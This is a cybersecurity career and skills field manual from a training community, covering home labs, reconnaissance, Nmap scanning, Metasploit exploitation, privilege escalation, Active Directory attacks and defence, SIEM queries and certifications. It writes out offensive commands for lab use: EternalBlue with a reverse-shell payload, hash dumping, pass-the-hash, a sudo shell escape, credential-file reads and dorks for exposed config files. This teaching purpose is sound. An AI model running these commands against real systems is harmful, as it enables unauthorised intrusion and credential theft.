Field Manual
Your success is our reward.
Your success is our reward.
Your master reference for breaking into cybersecurity — built from the Intro to Cyber and Breaking Into Cyber courses. From foundations to career paths, it’s all here.
Before you commit to cybersecurity, ask yourself three questions. Where all three overlap — that’s your lane.
| Question | Why It Matters |
|---|---|
| What are you really good at? | Skills compound. Build on your strengths. |
| What do you love doing? | Passion shows. Employers and clients feel it. |
| What does the world need? | Demand drives opportunity and salary. |
The people. The community. Knowing your why. When you’re clear on why you’re here — you can lean on it during the hard times.
The longer you’re in, the more you’ll see things no human should see — forensics, log analysis, incident investigations. Mental health matters. Take care of yourself. Pace yourself. This isn’t a sprint.
| Myth | Reality |
|---|---|
| You need a degree | No. You need skill, drive, and the right network. |
| You must start on the help desk | Helpful, not required. SOC, intel, GRC are valid entry points too. |
| It’s too late to switch careers | Career changers break in every day. Transferable skills are real. |
| The market is oversaturated | Competitive, yes. Closed, no. Skilled + visible = hired. |
🎯 The 401(k) Rule: Invest a little every day. Learn something — a video, an article, a lab session. Let it compound. One day you’ll look around and realize you’re actually pretty smart.
Cybersecurity isn’t just offense and defense. Here are the main paths — find yours and stack toward it.
| Role | What You Do | Cert Path |
|---|---|---|
| SOC Analyst | Monitor alerts, analyze logs, escalate incidents. The watch floor. Entry-friendly. | Security+ → CySA+ |
| Penetration Tester | Legally break into systems, find weaknesses, write reports. Mid-level work. | Security+ → eJPT → PNPT |
| GRC Analyst | Policy, compliance, NIST, CMMC, ISO. Great path to advisory and management. | Security+ → CISA |
| Security Engineer | Build and maintain security infrastructure — SIEM, EDR, cloud controls. | Cloud + Network certs + experience |
| IR / Forensics | Breach response, evidence collection, timeline analysis. Intense. High demand. | GCFE, GCFA |
| Cloud Security | Secure AWS / Azure / GCP environments. Every org is moving to cloud. | AWS Security, AZ-500, CCSP |
| AI Security | Audit, test, and secure AI systems. The new frontier — wide open. | Emerging — no standard path yet |
Intro to Cyber → Home Lab Setup → SOC Analyst Prep OR Pentester Prep → Attack & DefendAll free or affordable. All built from this community.
Cybersecurity = protecting systems, networks, and data from attack, damage, or unauthorized access. Three words run this field:
| Pillar | Definition | Analogy |
|---|---|---|
| Confidentiality | Only the right people see the data | Lock on the front door |
| Integrity | Data hasn’t been tampered with | Nobody moved your furniture |
| Availability | System is up when you need it | Lights stay on |
| Term | Definition |
|---|---|
| Threat | Any potential danger to a system or data |
| Vulnerability | A weakness that can be exploited |
| Risk | Likelihood × Impact of a threat exploiting a vuln |
| Exploit | Code or technique that takes advantage of a vulnerability |
Threat actors run the spectrum — from script kiddies to nation-states. Know who you’re up against.
| Actor | Motivation | Sophistication |
|---|---|---|
| Script Kiddie | Curiosity, notoriety | Low — uses existing tools |
| Hacktivist | Political / ideological | Medium |
| Cybercriminal | Financial gain | Medium–High |
| Insider Threat | Revenge, money, negligence | Variable — has access |
| Nation-State APT | Espionage, disruption | Very High — well-funded |
| Attack | What It Does |
|---|---|
| Phishing | Tricks users into giving credentials or clicking malicious links |
| Malware | Malicious software — viruses, trojans, ransomware, spyware |
| Ransomware | Encrypts data, demands payment. Biggest financial threat to orgs. |
| DDoS | Floods a service with traffic until it goes down (attacks Availability) |
| Man-in-the-Middle | Intercepts communication between two parties |
| SQL Injection | Injects malicious SQL into input fields to access backend databases |
Your home lab is your most valuable career asset. Not a cert. Not a degree. The lab. This is where skills are built.
| Tool | Type | Best For | Cost |
|---|---|---|---|
| VirtualBox | Type 2 | Beginners — runs on any OS | Free |
| Proxmox VE | Type 1 | Dedicated lab machine, enterprise-grade | Free |
| UTM | Type 2 | Apple Silicon (M1/M2/M3) | Free |
| VMware Workstation | Type 2 | Professionals, stability | Paid |
# After downloading VirtualBox + Kali ISO:
# 1. New VM → Linux → Debian 64-bit
# 2. RAM: 4GB minimum, 8GB recommended
# 3. Storage: 50GB minimum
# 4. Mount Kali ISO → boot → install
# 5. Install VirtualBox Guest Additions for clipboard/resize💡 Pro tip: Run Kali as a VM, not dual-boot. Snapshots let you reset to a clean state before each lab exercise.
Segment your lab network. Never let attack traffic touch your real network.
| Network Range | Purpose | Example Subnet |
|---|---|---|
| Management | Admin access to hypervisor and infrastructure | 192.168.1.0/24 |
| Lab / Attack | Attacker VMs (Kali) and target VMs (Metasploitable) | 192.168.10.0/24 |
| Guest | Isolated internet access for research VMs | 192.168.20.0/24 |
| Mode | Internet | VM-to-VM | Use Case |
|---|---|---|---|
| NAT | Yes | No | Single VM browsing |
| Host-Only | No | Yes | Isolated lab — attacker vs target |
| Internal | No | Yes | Fully isolated network segment |
| Bridged | Yes | Yes | Full network participation (careful!) |
# Check your interfaces in Kali
ip addr show
ip route show
# Confirm you can reach your target
ping 192.168.10.x
# Never run attack tools against anything
# you don't own or have written authorization for.Passive recon = gathering intel without touching the target. Like watching a house for a week before trying the door. No footprint. No logs on their end.
site:target.com # All indexed pages
site:target.com filetype:pdf # PDFs (often contain metadata)
site:target.com filetype:xls # Spreadsheets — common data leak
intitle:"index of" "backup" # Open directory listings
inurl:admin login # Admin panels
inurl:".env" OR inurl:"config.php" # Config files
"@target.com" filetype:csv # Email listswhois target.com # Registrar, org, contacts
dig target.com A # IPv4 addresses
dig target.com MX # Mail servers
dig target.com TXT # SPF, DKIM, verification records
dig target.com NS # Name servers
dig @8.8.8.8 target.com any # Query Google DNS directly| Source | What You’re Looking For |
|---|---|
| Shodan.io | Exposed services, banners, default creds, IoT devices |
| Censys.io | Certificate transparency, TLS configs, open ports |
| WHOIS / ARIN | IP ownership, org name, admin contacts |
| crt.sh | Subdomains via SSL cert transparency logs |
| HaveIBeenPwned | Check if org emails appear in breach data |
| Org chart, tech stack, employee names, software in job postings |
💡 Intel trick: Job postings reveal the firewall stack. LinkedIn reveals the org chart. Neither requires you to touch a single system.
theHarvester -d target.com -b google
theHarvester -d target.com -b linkedin
theHarvester -d target.com -b all -l 500# Install
pip install shodan
# Search for exposed services
shodan search "apache target.com"
shodan host 1.2.3.4 # Details on a specific IP
shodan count org:"Target Corp" # How many assets indexedrecon-ng
> marketplace install all
> workspaces create target
> modules load recon/domains-hosts/google_site_web
> options set SOURCE target.com
> runsublist3r -d target.com -o subdomains.txt
sublist3r -d target.com -b -p 80,443 # With brute forceYou’ve watched the house. Now you’re walking the perimeter. Active scanning means you’re touching the network. Written authorization required. Always. No exceptions.
# Discovery
nmap -sn 192.168.1.0/24 # Ping sweep — who's alive
nmap -sn 10.0.0.0/8 --exclude 10.0.0.1
# Service & OS Detection
nmap -sV 192.168.1.x # Service version detection
nmap -O 192.168.1.x # OS fingerprinting
nmap -sV -O -A 192.168.1.x # Aggressive — all of the above
# Port Ranges
nmap -p 80,443,445,22 192.168.1.x # Specific ports
nmap -p- 192.168.1.x # All 65535 ports (slow)
nmap -p 1-1000 192.168.1.x # Port range
# Output
nmap -oN scan.txt 192.168.1.x # Normal output
nmap -oX scan.xml 192.168.1.x # XML (for import to tools)
nmap -oA fullscan 192.168.1.x # All formats# Vulnerability scripts
nmap --script vuln 192.168.1.x
nmap --script vuln,safe 192.168.1.x
# SMB enumeration
nmap -p 445 --script smb-enum-shares 192.168.1.x
nmap -p 445 --script smb-enum-users 192.168.1.x
nmap -p 445 --script smb-vuln-ms17-010 192.168.1.x # EternalBlue check
# HTTP
nmap -p 80,443 --script http-title,http-headers 192.168.1.x
# Default scripts
nmap -sC 192.168.1.x💡 The -sV flag is your best friend. Version detection turns port numbers into actual attack surface.
SMB (port 445) is one of the richest sources of information on a Windows network — and one of the most exploited. Never ignore port 445.
# Enumerate shares
smbclient -L //192.168.1.x -N # Anonymous listing
smbclient //192.168.1.x/share -N # Connect anonymously
# Enum4linux — full Windows enumeration
enum4linux -a 192.168.1.x
enum4linux -U 192.168.1.x # Users
enum4linux -S 192.168.1.x # Shares
enum4linux -P 192.168.1.x # Password policy
# CrackMapExec
crackmapexec smb 192.168.1.0/24 # Network sweep
crackmapexec smb 192.168.1.x -u '' -p '' # Null sessionwhoami /all # Current user + privileges
net user # All local users
net user username # Specific user details
net localgroup # All local groups
net localgroup Administrators # Members of Admins group
systeminfo # OS, patches, hotfixes
ipconfig /all # All network interfaces
netstat -ano # Active connections + PIDs
tasklist /v # Running processes
wmic product get name # Installed softwareEvery open port is a door. Your job is to know what’s behind each one.
| Port | Service | Risk / Notes |
|---|---|---|
| 21 | FTP | 🚨 Cleartext — credentials in plaintext. Immediate finding. |
| 22 | SSH | Encrypted. Brute-force target if misconfigured or weak creds. |
| 23 | Telnet | 🚨 Cleartext — everything visible on the wire. Should not exist. |
| 25 | SMTP | Email relay. Check for open relay misconfiguration. |
| 53 | DNS | Zone transfer attempt (axfr). Subdomain enumeration. |
| 80 | HTTP | Web server. Cleartext. Biggest attack surface. |
| 110 | POP3 | Email retrieval — cleartext. |
| 135 | MSRPC | Windows RPC. Enumeration target. |
| 139 | NetBIOS | Legacy Windows sharing. Often goes with 445. |
| 143 | IMAP | Email — cleartext unless STARTTLS. |
| 443 | HTTPS | Encrypted web. Check cert, TLS version, cipher suites. |
| 445 | SMB | 🚨 Windows file sharing. Home of EternalBlue (MS17-010). Never ignore. |
| 1433 | MSSQL | SQL Server. SA account brute force, xp_cmdshell risk. |
| 3306 | MySQL | Check for public exposure. Auth bypass attempts. |
| 3389 | RDP | Remote desktop. Brute force, BlueKeep (CVE-2019-0708). |
| 5985/5986 | WinRM | Windows Remote Management. Used for lateral movement. |
| 8080/8443 | HTTP Alt | Dev/admin panels, proxies. Often less hardened. |
nc -zv 192.168.1.x 22 # Check if port is open
nc 192.168.1.x 22 # Grab the banner
curl -I http://192.168.1.x # HTTP header grab| Technique | Description | MITRE ATT&CK |
|---|---|---|
| Phishing | Email/social engineering to steal credentials or deliver payloads | T1566 |
| Spear Phishing | Targeted phishing against specific individuals | T1566.001 |
| Password Spraying | One password tried against many accounts (avoids lockout) | T1110.003 |
| Credential Stuffing | Breached username/password pairs tried on other services | T1110.004 |
| Pass-the-Hash | Reuse NTLM hash without cracking the actual password | T1550.002 |
| Kerberoasting | Request service tickets for offline cracking | T1558.003 |
| SQL Injection | Inject SQL into input fields to query or dump the DB | T1190 |
| XSS | Inject client-side scripts to steal cookies or hijack sessions | T1059.007 |
| SSRF | Force server to make requests to internal resources | T1190 |
| Command Injection | OS commands injected through web input | T1059 |
| Path Traversal | ../../etc/passwd — read files outside the web root | T1083 |
| Lateral Movement | Move from compromised system to other systems on the network | TA0008 |
IPv6 is already on your network. Most orgs don’t know it. Organizations spend years hardening IPv4 and leave IPv6 wide open. That’s a pivot path for attackers.
| Type | Prefix | Example |
|---|---|---|
| Link-Local | fe80::/10 | fe80::1 (auto-assigned, non-routable) |
| Global Unicast | 2001::/32 | 2001:db8::1 (internet-routable) |
| Loopback | ::1/128 | ::1 (equivalent of 127.0.0.1) |
| Multicast | ff00::/8 | ff02::1 = all-nodes on link |
| IPv4 | IPv6 |
|---|---|
| ARP (Address Resolution Protocol) | NDP — Neighbor Discovery Protocol |
| 32-bit address (4.3B addresses) | 128-bit address (3.4×10³⁸ addresses) |
| NAT common | NAT not needed — every device gets a global address |
| Broadcast | Multicast + Anycast |
# Linux
ip -6 addr # Show IPv6 addresses
ip -6 route # IPv6 routing table
ping6 fe80::1%eth0 # Ping link-local (specify interface)
# Enumerate IPv6 on the network
nmap -6 -sn fe80::/64 # Scan link-local range
nmap -6 2001:db8::/64 # Scan global range
# DNS
dig AAAA target.com # IPv6 DNS record
dig -6 target.com # Query over IPv6🚨 Assessment finding: If you find IPv6 on a network and the client has no monitoring for it — that’s a documented finding every time.
Wireshark is the truth machine. Everything that moves on the wire is visible here. When you can read a packet capture, you can see things no one else can see.
ip.addr == 192.168.1.5 # Traffic to/from a specific IP
ip.src == 192.168.1.5 # Traffic FROM this IP
ip.dst == 192.168.1.5 # Traffic TO this IP
tcp.port == 80 # HTTP traffic
tcp.port == 443 # HTTPS traffic
http # All HTTP
dns # All DNS queries/responses
icmp # Ping traffic
smtp || pop3 || imap # Email protocols
!(arp || dns || icmp) # Filter out noise| Action | How | What You See |
|---|---|---|
| Follow a stream | Right-click packet → Follow → TCP Stream | Full conversation — both sides |
| Export objects | File → Export Objects → HTTP | Files transferred over HTTP |
| Find credentials | Filter: http.authbasic OR ftp | Cleartext credentials |
| Check DNS | Filter: dns.flags.response == 0 | All DNS queries made |
host 192.168.1.5 # Only traffic to/from this host
port 80 or port 443 # Only web traffic
net 192.168.1.0/24 # Only this subnet
not port 22 # Exclude SSH💡 “This is where the story lives.” When you follow a TCP stream, you see the full conversation — not just individual packets. HTTP requests and responses are in plain text.
Assessment asks: what vulnerabilities exist? Pentest asks: what can we actually break? Those are different questions with different scopes and deliverables.
Scope → Scan → Validate → Document → Report → Rescan| Phase | What You Do |
|---|---|
| Scope | Define IPs, systems, timeframe, rules of engagement |
| Scan | Run vulnerability scanners against in-scope targets |
| Validate | Confirm findings are real — false positives are common |
| Document | CVSS score, affected system, evidence, remediation |
| Report | Executive summary + technical findings with remediation steps |
| Rescan | Verify remediations were applied (attestation scan) |
nmap --script vuln 192.168.1.x
nmap --script vuln,safe 192.168.1.x # Safe scripts only
nmap -p 445 --script smb-vuln-ms17-010 # EternalBlue
nmap -p 443 --script ssl-heartbleed # Heartbleed
nmap --script http-vuln-* 192.168.1.x # All HTTP vuln scripts| Score | Severity | Action |
|---|---|---|
| 9.0–10.0 | Critical | Remediate immediately |
| 7.0–8.9 | High | Remediate within 30 days |
| 4.0–6.9 | Medium | Remediate within 90 days |
| 0.1–3.9 | Low | Remediate within 180 days / accept risk |
⚠️ False positives are real. A tool saying a vulnerability exists doesn’t mean it’s exploitable. Validate before you document.
Nessus Essentials is free for up to 16 IPs. That’s your entire home lab. Download it tonight.
# Download from: tenable.com/products/nessus/nessus-essentials
# Register for a free activation code
# Install on Kali or Ubuntu:
dpkg -i Nessus-*.deb
systemctl start nessusd
# Access at: https://localhost:8834| Scan Type | Use Case |
|---|---|
| Basic Network Scan | General vulnerability discovery — start here |
| Credentialed Scan | Logs in to target for deeper inspection (more findings) |
| Web Application | Tests web apps for common vulnerabilities |
| Malware Scan | Checks for indicators of compromise |
# Sort by CVSS severity — Critical first
# Click any finding for:
# - Description
# - Solution
# - CVE references
# - Plugin output (evidence)
# Export: Reports → Export → CSV or PDF💡 Run scans monthly in your lab. Show your improvement over time. That’s what a security program looks like — measurable progress.
Exploitation = turning a vulnerability into access. This is where theory meets practice. Do this in your lab. Never on systems you don’t own.
msfconsole # Launch Metasploit
# Find an exploit
search ms17-010 # EternalBlue
search type:exploit platform:windows smb
# Use and configure
use exploit/windows/smb/ms17_010_eternalblue
show options # What needs to be set
set RHOSTS 192.168.1.x
set LHOST 192.168.1.attack # Your Kali IP
run # Execute| Component | What It Is | Example |
|---|---|---|
| Module | The exploit code — how you get in | ms17_010_eternalblue |
| Payload | What runs after you get access | windows/x64/meterpreter/reverse_tcp |
| Session | The active connection to the target | Meterpreter shell |
| Shell Type | Direction | Use When |
|---|---|---|
| Bind Shell | You connect TO the target | Target has no outbound filtering |
| Reverse Shell | Target connects BACK to you | Firewalls block inbound — usually better |
# Meterpreter basic commands (after getting a session)
sysinfo # System info
getuid # Current user
hashdump # Dump password hashes (if admin)
shell # Drop to cmd.exe
upload file.exe /tmp/ # Upload a file
download file.txt /tmp/ # Download a file🔬 Metasploitable 2 is your practice target — intentionally vulnerable, built for this. Set it up in your lab and work through every service on it.
Getting in is step one. What you do next is the actual skill. Post-exploitation is about understanding what access you have and what you can do with it.
| Goal | What It Means | Tools |
|---|---|---|
| Situational Awareness | Who am I? What’s on this machine? What network am I on? | whoami, ipconfig, netstat |
| Persistence | Maintain access even if the machine reboots | Registry run keys, scheduled tasks, services |
| Credential Harvesting | Extract passwords/hashes for lateral movement | Mimikatz, secretsdump, hashdump |
| Lateral Movement | Move to other machines using harvested credentials | PsExec, WMI, WinRM, SMB |
| Data Discovery | Find sensitive files, databases, credentials | dir, find, grep, Meterpreter search |
| Exfiltration (sim) | Demonstrate what data could be taken | Document only — don’t actually exfil in real engagements |
# You don't need to crack the hash — you can use it directly
evil-winrm -i 192.168.1.x -u Administrator -H <NTLM-HASH>
crackmapexec smb 192.168.1.0/24 -u Administrator -H <NTLM-HASH>Goal: get from a low-privilege user to SYSTEM or Administrator. Check these vectors in order.
# What privileges do I have?
whoami /priv
whoami /groups
# Unquoted service paths
wmic service get name,pathname,startmode | findstr /v """" | findstr /v "C:\Windows"
# Weak service permissions
accesschk.exe -uwcqv "Everyone" * 2>/dev/null
accesschk.exe -uwcqv "Users" *
# Scheduled tasks running as SYSTEM
schtasks /query /fo LIST /v | findstr "Task To Run\|Run As User"
# AlwaysInstallElevated (MSI installs as SYSTEM if set)
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# Stored credentials
cmdkey /list
reg query HKLM /f password /t REG_SZ /s📚 Reference: Fuzzy Security’s Windows Privilege Escalation guide. Bookmark it. Search it every engagement.
Four vectors I check every time on Linux. Work through all four before moving on.
find / -perm -u=s -type f 2>/dev/null
# If you find anything unusual — check GTFOBins
# gtfobins.github.iocat /etc/crontab
ls -la /etc/cron.*
crontab -l
# Look for scripts you can write to that run as rootsudo -l # What can you run as sudo?
# If you see (ALL) NOPASSWD: /usr/bin/find
# sudo find . -exec /bin/sh \; -quit → instant rootecho $PATH
# If /tmp or . is in PATH, you can hijack commands
ls -la /usr/local/bin /usr/bin # Check write permscat /etc/passwd # Users with shells
cat /etc/shadow # Password hashes (if readable — rare)
find / -name "*.bak" -o -name "*.conf" 2>/dev/null | xargs grep -i passw
uname -a # Kernel version → check for kernel exploitsIf you understand Active Directory, you understand enterprise security. AD is the backbone of every Windows shop — authentication, authorization, and access for every user and machine.
One misconfigured account can give you the keys to the kingdom. The three AD attacks every analyst needs to know:
| Attack | How It Works | Detection |
|---|---|---|
| Kerberoasting | Request service tickets for any SPN, crack the ticket offline | Unusual Kerberos TGS requests, failed service account logins |
| Pass-the-Hash | Reuse NTLM hash without knowing the password | Login events from unexpected IPs/systems |
| BloodHound / Delegation Abuse | Map attack paths through AD relationships and privileges | Unusual LDAP queries, tool signatures |
# Collect data from domain (as domain user)
SharpHound.exe -c All
# Or remotely with bloodhound-python
bloodhound-python -u user -p pass -d domain.local -c All
# Open BloodHound → import ZIP → find shortest path to Domain Admin# Windows Event IDs to alert on:
4625 # Failed login attempt
4648 # Login with explicit credentials (lateral movement)
4672 # Special privilege logon (admin)
4688 # New process created (execution)
4698 # Scheduled task created
7045 # New service installed
4724 # Password reset attempt💡 Add a Windows Server or Active Directory VM to your lab. Learning AD on your own domain controller = immediately transferable skills.
“If it didn’t get logged, it didn’t happen — and that is the attacker’s best friend.” SOC analysts live in the SIEM. This is your first language if blue team is your path.
| Tool | Type | Why Use It |
|---|---|---|
| Splunk Free | SIEM | Industry standard. 500MB/day free. Learn the query language cold. |
| Wazuh | Open-source XDR/SIEM | Full capability, free, runs on your lab VMs. Start here. |
| Elastic Stack (ELK) | Log platform | Elasticsearch + Logstash + Kibana. Powerful, free. |
| Security Onion | NSM/SIEM distro | All-in-one: Zeek, Suricata, Elasticsearch. Drop it in your lab. |
# Failed logins
index=wineventlog EventCode=4625 | stats count by src_ip
# Top talkers on the network
index=network | stats sum(bytes) as total by src_ip | sort -total
# Detect port scanning
index=network | stats dc(dest_port) as ports by src_ip | where ports > 50
# Privilege escalation events
index=wineventlog (EventCode=4672 OR EventCode=4673) | table _time, user, src_ipIR is where the money is. Every organization needs someone who can keep a cool head when everything’s on fire.
| Phase | What You Do | Key Action |
|---|---|---|
| 1. Preparation | IR plan, playbooks, tabletops — BEFORE the incident | Define roles, tools, escalation path |
| 2. Identification | Detect and confirm an incident has occurred | Alert triage, initial indicators |
| 3. Containment | CONTAIN FIRST. Investigate second. Stop the bleeding. | Isolate affected systems, block IPs |
| 4. Eradication | Remove the threat — malware, accounts, backdoors | Clean systems, patch vulnerabilities |
| 5. Recovery | Restore systems from clean backups, verify integrity | Monitor for reinfection |
| 6. Lessons Learned | What happened? How do we prevent it? Update playbooks. | Post-incident report within 2 weeks |
1. CONTAIN — isolate the affected system(s) from the network
2. SCOPE — determine the blast radius
3. DOCUMENT — timestamp everything you touch and find
4. ESCALATE — notify your IR lead and management per the plan
5. PRESERVE — don't wipe anything until forensics is doneDocument everything with timestamps — what you touched, when, and what you found. In a legal proceeding, that documentation is evidence. Handle it accordingly.
⚠️ The worst time to figure out your IR process is during an actual breach. Run tabletop exercises before you need them.
CTFs are your practice range and your portfolio at the same time. Every writeup you publish is a portfolio piece. Employers notice people who build in public.
| Platform | Level | Why Use It |
|---|---|---|
| TryHackMe | Beginner–Intermediate | Guided paths, browser-based, beginner-friendly. Start here tonight. |
| HackTheBox | Intermediate–Advanced | Harder, more realistic. Employer-recognized. Build here after THM. |
| PicoCTF | Beginner | Fundamentals — runs in a browser. No setup needed. |
| PortSwigger Web Academy | All levels | Best free web application security training on the internet. Period. |
| DVWA | Beginner | Damn Vulnerable Web App — run it in your lab. All major web vulns. |
| Metasploitable 2 | Beginner | Intentionally vulnerable Linux VM. Perfect Metasploit practice target. |
1. Document your methodology — not just the answer
2. Include: reconnaissance → enumeration → exploitation → flags
3. Post to GitHub or a personal blog
4. Link it on LinkedIn
5. Repeat
Your first 10 writeups = your first 10 portfolio pieces.
Consistency is more impressive than a cert.Built by the community, for the community. All free or affordable.
| Course / Resource | Level | Link |
|---|---|---|
| Breaking Into Cyber | Beginner | cover6solutions.com/courses |
| Intro to Cyber (I2C) | Beginner–Intermediate | cover6solutions.com/courses |
| Home Lab Setup | Beginner | 12-phase course — live now |
| SOC Analyst Prep | Intermediate | Blue team focused |
| Pentester Prep | Intermediate | Red team focused |
| Attack & Defend | Advanced | Where it all comes together |
| Resource | Access |
|---|---|
| Discord Community | discord.gg/x7MXS3yMqb |
| Free Meetups (biweekly) | meetup.com/dccyberwarriors |
| YouTube (live streams + replays) | youtube.com/@Cover6Solutions |
| Submit a Talk | papercall.io/cover6community |
| Free Handouts & Guides | Linked in course descriptions |
🎯 Your next steps: Create a TryHackMe account → install Kali in VirtualBox → download the Security+ exam objectives → show up at the next meetup. That’s it. That’s the whole plan.
Security+ first. Always. It’s the baseline. It proves you understand the fundamentals. Every other cert builds on it.
| Cert | Focus | Cost | Difficulty |
|---|---|---|---|
| CompTIA Security+ | Security fundamentals — START HERE | ~$392 | Beginner–Mid |
| CompTIA A+ | Hardware + OS fundamentals | ~$246 × 2 | Beginner |
| CompTIA Network+ | Networking fundamentals | ~$338 | Beginner |
| ISC2 CC | Security concepts (free exam through ISC2) | Free | Beginner |
| Path | Cert Stack |
|---|---|
| Blue Team / SOC | Security+ → CySA+ → GCIH |
| Red Team / Pentest | Security+ → eJPT → PNPT → OSCP |
| GRC / Compliance | Security+ → CISA → CISSP |
| Cloud Security | Security+ → Cloud+ OR AWS Security → CCSP |
| Management | CISM → CISSP |
Step 1: Download the exam objectives (free from CompTIA)
Step 2: Build a slide deck — one slide per objective
Step 3: Explain each objective out loud (Feynman technique)
Step 4: Professor Messer videos — free, comprehensive
Step 5: Practice exams until you score 85%+ consistently
Step 6: Schedule the exam when you're hitting 85%+💡 Cert maintenance matters. CompTIA certs expire every 3 years. Earn CPE credits through conferences, training, and community contributions to renew without retesting.
The technical skills get you considered. The human skills get you hired.
Hiring works like pickup basketball. You don’t get picked because you asked nicely — you get picked because people watched you practice. Your lab work, writeups, conference talks, LinkedIn activity, GitHub repos — that’s you on the sideline showing you can ball. The people who get picked are the ones who are visibly doing the work.
"I've been trying to [do X]. I tried [A, B, C, D].
I've been at it for [X days]. Nothing is working.
Can you help?"
Show your work. Show effort. Then ask.
People will help someone who's genuinely trying.| Action | Why |
|---|---|
| Connect with 5 people in cyber on LinkedIn | Network before you need it |
| Join the Cover6 Discord | Active community, daily help, job leads |
| Attend a free meetup | See and be seen. The remora fish principle. |
| Post your first writeup or lab update | Build in public — employers notice |
| Submit a talk to a local BSides/meetup | Even if you think you’re not ready — submit |